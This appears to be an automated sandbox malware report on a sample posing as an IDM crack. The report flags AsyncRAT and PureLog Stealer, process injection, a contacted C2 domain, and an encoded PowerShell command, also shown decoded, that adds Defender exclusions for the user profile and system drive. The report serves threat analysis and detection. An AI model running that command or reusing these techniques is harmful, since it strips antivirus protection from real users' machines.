Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\KMj8h32vWy.exe

Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,

0_2_004014D1

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: Base64 decoded <#myi#>Add-MpPreference <#xda#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gdp#> -Force <#xzt#>
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: Base64 decoded <#myi#>Add-MpPreference <#xda#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gdp#> -Force <#xzt#>			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B6008	Jump to behavior

Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\Hzoynygqzv.exe "C:\Users\user\AppData\Local\Hzoynygqzv.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe "C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajag0aeqbpacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahgazabhacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcazabwacmapgagac0argbvahiaywblacaapaajahgaegb0acmapga="
Source: C:\Users\user\Desktop\KMj8h32vWy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajag0aeqbpacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahgazabhacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcazabwacmapgagac0argbvahiaywblacaapaajahgaegb0acmapga="			Jump to behavior

Source: InstallUtil.exe, 00000005.00000002.2894655463.0000000002610000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002619000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002602000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q
Source: InstallUtil.exe, 00000005.00000002.2894655463.000000000263F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qdGd
Source: InstallUtil.exe, 00000005.00000002.2894655463.0000000002610000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002619000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002602000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000005.00000002.2894655463.000000000263F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qDId
Source: InstallUtil.exe, 00000005.00000002.2894655463.0000000002610000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002619000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002602000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q%
Source: InstallUtil.exe, 00000005.00000002.2894655463.0000000002610000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002619000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.0000000002602000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q
Source: InstallUtil.exe, 00000005.00000002.2894655463.0000000002619000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^qh

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Queries volume information: C:\Users\user\AppData\Local\Hzoynygqzv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Hzoynygqzv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30b1758.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Ouopxupnarf.exe.347dcf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.310b37c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Hzoynygqzv.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Ouopxupnarf.exe PID: 7984, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.Hzoynygqzv.exe.5570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.5570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1654293004.0000000005570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.Hzoynygqzv.exe.5570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Hzoynygqzv.exe.5570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1654293004.0000000005570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Windows Management Instrumentation	1 Scheduled Task/Job	312 Process Injection	11 Masquerading	OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	51 Virtualization/Sandbox Evasion	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 DLL Side-Loading	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KMj8h32vWy.exe	71%	ReversingLabs	Win32.Backdoor.AsyncRAT
KMj8h32vWy.exe	70%	Virustotal		Browse
KMj8h32vWy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Hzoynygqzv.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Hzoynygqzv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Hzoynygqzv.exe	67%	ReversingLabs	ByteCode-MSIL.Trojan.Mardom
C:\Users\user\AppData\Local\Hzoynygqzv.exe	63%	Virustotal		Browse
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	74%	ReversingLabs	Win32.Trojan.Bianlian
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	70%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	67%	ReversingLabs	ByteCode-MSIL.Trojan.Mardom
C:\Users\user\AppData\Roaming\Ouopxupnarf.exe	63%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
tomx.brasilia.me	2%	Virustotal	Browse
windowsupdatebg.s.llnwi.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
tomx.brasilia.me	0%	Avira URL Cloud	safe
tomx.brasilia.me	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
tomx.brasilia.me	91.92.253.249	true	true	2%, Virustotal, Browse	unknown
windowsupdatebg.s.llnwi.net	69.164.42.0	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tomx.brasilia.me	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1658568749.0000000004981000.00000004.00000800.00020000.00000000.sdmp	false		high
